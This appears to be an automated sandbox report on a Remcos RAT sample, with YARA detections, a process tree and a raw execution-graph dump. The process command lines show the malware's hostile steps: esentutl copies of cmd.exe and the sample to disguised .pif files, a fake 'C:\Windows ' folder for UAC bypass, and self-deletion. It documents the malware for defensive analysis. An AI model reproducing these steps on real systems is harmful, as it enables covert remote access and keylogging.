                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 4c 42 67 72 48 68 77 72 4b 42 77 70 49 69 38 73 49 43 34 76 49 43 55 70 49 79 77 69 4b 43 59 69 4a 7a 45 62 4a 69 38 65 4a 43 45 61 4b 79 51 73 4b 79 34 6f 4c 52 67 6a 4b 78 67 78 4d 79 34 66 48 69 73 6b 49 69 63 78 47 79 41 63 4d 53 59 70 49 79 4d 63 4c 43 59 67 4a 52 77 77 47 42 38 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67
                                                                                                                      Data Ascii: LBgrHhwrKBwpIi8sIC4vICUpIywiKCYiJzEbJi8eJCEaKyQsKy4oLRgjKxgxMy4fHiskIicxGyAcMSYpIyMcLCYgJRwwGB8cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBg


                                                                                                                      Target ID:0
                                                                                                                      Start time:05:04:33
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\jW3NEKvxH1.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:05:04:42
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:05:04:43
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:04:43
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                      Imagebase:0x8e0000
                                                                                                                      File size:226'712 bytes
                                                                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:04:45
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:04:46
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\xpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                      Imagebase:0x840000
                                                                                                                      File size:18'944 bytes
                                                                                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:05:04:57
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Dlaybpxl.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Dlaybpxl.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      Target ID:17
                                                                                                                      Start time:05:04:58
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:18
                                                                                                                      Start time:05:04:59
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:19
                                                                                                                      Start time:05:04:59
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                      Imagebase:0x8e0000
                                                                                                                      File size:226'712 bytes
                                                                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Has exited:true

                                                                                                                      Target ID:20
                                                                                                                      Start time:05:05:00
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:23
                                                                                                                      Start time:05:05:05
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Dlaybpxl.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Dlaybpxl.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Has exited:true

                                                                                                                      Target ID:24
                                                                                                                      Start time:05:05:06
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                      Imagebase:0x440000
                                                                                                                      File size:86'528 bytes
                                                                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:6.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:4.3%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:21
76328->76334 76332 2d585f1 76329->76332 76333 2d347ec 11 API calls 76330->76333 76336 2d56310 76331->76336 76335 2d585fc 76332->76335 76341 2d57ad6 76333->76341 76338 2d489d0 20 API calls 76334->76338 76337 2d489d0 20 API calls 76335->76337 76339 2d489d0 20 API calls 76336->76339 76340 2d58615 76337->76340 76342 2d59499 76338->76342 76344 2d56334 76339->76344 76345 2d34860 11 API calls 76340->76345 76347 2d489d0 20 API calls 76341->76347 76343 2d34860 11 API calls 76342->76343 76348 2d594ba 76343->76348 76346 2d34860 11 API calls 76344->76346 76349 2d58636 76345->76349 76350 2d56355 76346->76350 76351 2d57afa 76347->76351 76352 2d347ec 11 API calls 76348->76352 76353 2d347ec 11 API calls 76349->76353 76354 2d347ec 11 API calls 76350->76354 77521 2d4adf8 29 API calls 76351->77521 76358 2d594f1 76352->76358 76359 2d5866d 76353->76359 76360 2d5638c 76354->76360 76356 2d57b21 76357 2d34860 11 API calls 76356->76357 76364 2d57b42 76357->76364 76362 2d489d0 20 API calls 76358->76362 76361 2d489d0 20 API calls 76359->76361 76365 2d489d0 20 API calls 76360->76365 76363 2d58691 76361->76363 76374 2d59515 76362->76374 76367 2d347ec 11 API calls 76363->76367 76370 2d347ec 11 API calls 76364->76370 76366 2d563b0 76365->76366 76368 2d34860 11 API calls 76366->76368 76369 2d586bd 76367->76369 76375 2d563d1 76368->76375 76373 2d586d5 76369->76373 76376 2d57b79 76370->76376 76371 2d59cf5 76372 2d34860 11 API calls 76371->76372 76378 2d59d16 76372->76378 76380 2d586e0 CreateProcessAsUserW 76373->76380 76374->76371 76377 2d34860 11 API calls 76374->76377 76379 2d347ec 11 API calls 76375->76379 76381 2d489d0 20 API calls 76376->76381 76389 2d59560 76377->76389 76385 2d347ec 11 API calls 76378->76385 76391 2d56408 76379->76391 76382 2d586f2 76380->76382 76383 2d5876e 76380->76383 76384 2d57b9d 76381->76384 76387 2d34860 11 API calls 76382->76387 76386 2d34860 11 API calls 76383->76386 76388 2d34860 11 API calls 76384->76388 76395 2d59d4d 76385->76395 76397 2d5878f 76386->76397 76390 
2d58713 76387->76390 76394 2d57bbe 76388->76394 76392 2d347ec 11 API calls 76389->76392 76393 2d5871e 76390->76393 76396 2d489d0 20 API calls 76391->76396 76406 2d59597 76392->76406 76399 2d347ec 11 API calls 76393->76399 76400 2d347ec 11 API calls 76394->76400 76401 2d489d0 20 API calls 76395->76401 76398 2d5642c 76396->76398 76403 2d347ec 11 API calls 76397->76403 76402 2d34860 11 API calls 76398->76402 76405 2d5874a 76399->76405 76413 2d57bf5 76400->76413 76404 2d59d71 76401->76404 76411 2d5644d 76402->76411 76412 2d587c6 76403->76412 76407 2d34860 11 API calls 76404->76407 76409 2d58755 76405->76409 76408 2d489d0 20 API calls 76406->76408 76415 2d59d92 76407->76415 76410 2d595bb 76408->76410 76418 2d489d0 20 API calls 76409->76418 76414 2d34860 11 API calls 76410->76414 76416 2d347ec 11 API calls 76411->76416 76417 2d489d0 20 API calls 76412->76417 76419 2d489d0 20 API calls 76413->76419 76425 2d595dc 76414->76425 76422 2d347ec 11 API calls 76415->76422 76426 2d56484 76416->76426 76420 2d587ea 76417->76420 76418->76383 76421 2d57c19 76419->76421 76423 2d34860 11 API calls 76420->76423 76424 2d34860 11 API calls 76421->76424 76429 2d59dc9 76422->76429 76431 2d5880b 76423->76431 76428 2d57c3a 76424->76428 76427 2d347ec 11 API calls 76425->76427 76430 2d489d0 20 API calls 76426->76430 76437 2d59613 76427->76437 76433 2d347ec 11 API calls 76428->76433 76434 2d489d0 20 API calls 76429->76434 76432 2d564a8 76430->76432 76436 2d347ec 11 API calls 76431->76436 76435 2d34860 11 API calls 76432->76435 76444 2d57c71 76433->76444 76438 2d59ded 76434->76438 76439 2d564d5 76435->76439 76443 2d58842 76436->76443 76441 2d489d0 20 API calls 76437->76441 76440 2d34860 11 API calls 76438->76440 77361 2d485bc 76439->77361 76448 2d59e0e 76440->76448 76445 2d59637 76441->76445 76450 2d489d0 20 API calls 76443->76450 76451 2d489d0 20 API calls 76444->76451 76446 2d34860 11 API calls 76445->76446 76455 2d59658 76446->76455 76454 2d347ec 11 API calls 76448->76454 76449 2d34860 11 API 
calls 76457 2d56507 76449->76457 76452 2d58866 76450->76452 76453 2d57c95 76451->76453 76456 2d349f8 11 API calls 76452->76456 76459 2d34860 11 API calls 76453->76459 76461 2d59e45 76454->76461 76460 2d347ec 11 API calls 76455->76460 76458 2d5888a 76456->76458 76462 2d347ec 11 API calls 76457->76462 76463 2d34860 11 API calls 76458->76463 76464 2d57cd5 76459->76464 76467 2d5968f 76460->76467 76465 2d489d0 20 API calls 76461->76465 76469 2d5653e 76462->76469 76466 2d588b9 76463->76466 76468 2d347ec 11 API calls 76464->76468 76473 2d59e69 76465->76473 76471 2d588c4 76466->76471 76470 2d489d0 20 API calls 76467->76470 76481 2d57d0c 76468->76481 76474 2d489d0 20 API calls 76469->76474 76472 2d596b3 76470->76472 76476 2d347ec 11 API calls 76471->76476 76477 2d4f094 11 API calls 76472->76477 76478 2d489d0 20 API calls 76473->76478 76475 2d56562 76474->76475 76479 2d34860 11 API calls 76475->76479 76480 2d588f0 76476->76480 76482 2d596ce 76477->76482 76486 2d59e9c 76478->76486 76487 2d56583 76479->76487 76488 2d588fb 76480->76488 76484 2d489d0 20 API calls 76481->76484 76483 2d34860 11 API calls 76482->76483 76490 2d596f7 76483->76490 76485 2d57d30 76484->76485 76489 2d34860 11 API calls 76485->76489 76492 2d489d0 20 API calls 76486->76492 76493 2d347ec 11 API calls 76487->76493 76491 2d489d0 20 API calls 76488->76491 76497 2d57d51 76489->76497 76495 2d34860 11 API calls 76490->76495 76494 2d58914 76491->76494 76499 2d59ecf 76492->76499 76500 2d565ba 76493->76500 76496 2d34860 11 API calls 76494->76496 76501 2d5972f 76495->76501 76502 2d58935 76496->76502 76498 2d347ec 11 API calls 76497->76498 76508 2d57d88 76498->76508 76503 2d489d0 20 API calls 76499->76503 76504 2d489d0 20 API calls 76500->76504 76505 2d347ec 11 API calls 76501->76505 76507 2d347ec 11 API calls 76502->76507 76510 2d59f02 76503->76510 76506 2d565de 76504->76506 76512 2d59766 76505->76512 76509 2d34860 11 API calls 76506->76509 76513 2d5896c 76507->76513 76511 2d489d0 20 API calls 76508->76511 76516 
2d565ff 76509->76516 76515 2d489d0 20 API calls 76510->76515 76514 2d57dac 76511->76514 76518 2d489d0 20 API calls 76512->76518 76520 2d489d0 20 API calls 76513->76520 76517 2d34860 11 API calls 76514->76517 76519 2d59f35 76515->76519 76523 2d347ec 11 API calls 76516->76523 76527 2d57dcd 76517->76527 76521 2d5978a 76518->76521 76522 2d34860 11 API calls 76519->76522 76524 2d58990 76520->76524 76525 2d34860 11 API calls 76521->76525 76528 2d59f56 76522->76528 76529 2d56636 76523->76529 76526 2d34860 11 API calls 76524->76526 76531 2d597ab 76525->76531 76532 2d589b1 76526->76532 76530 2d347ec 11 API calls 76527->76530 76533 2d347ec 11 API calls 76528->76533 76534 2d489d0 20 API calls 76529->76534 76538 2d57e04 76530->76538 76535 2d347ec 11 API calls 76531->76535 76537 2d347ec 11 API calls 76532->76537 76541 2d59f8d 76533->76541 76536 2d5665a 76534->76536 76544 2d597e2 76535->76544 76539 2d34860 11 API calls 76536->76539 76542 2d589e8 76537->76542 76540 2d489d0 20 API calls 76538->76540 76546 2d5667b 76539->76546 76543 2d57e28 76540->76543 76545 2d489d0 20 API calls 76541->76545 76550 2d489d0 20 API calls 76542->76550 77522 2d45aec 42 API calls 76543->77522 76548 2d489d0 20 API calls 76544->76548 76549 2d59fb1 76545->76549 76554 2d347ec 11 API calls 76546->76554 76552 2d59806 76548->76552 76553 2d34860 11 API calls 76549->76553 76555 2d58a0c 76550->76555 76557 2d37e5c GetFileAttributesA 76552->76557 76567 2d59fd2 76553->76567 76568 2d566b2 76554->76568 77378 2d4d164 76555->77378 76556 2d57e54 76564 2d34bcc 11 API calls 76556->76564 76559 2d59810 76557->76559 76561 2d59aef 76559->76561 76562 2d59818 76559->76562 76566 2d34860 11 API calls 76561->76566 76565 2d34860 11 API calls 76562->76565 76569 2d57e69 76564->76569 76574 2d59839 76565->76574 76575 2d59b10 76566->76575 76571 2d347ec 11 API calls 76567->76571 76572 2d489d0 20 API calls 76568->76572 76570 2d34860 11 API calls 76569->76570 76576 2d57e8a 76570->76576 76580 2d5a009 76571->76580 76582 2d566d6 76572->76582 
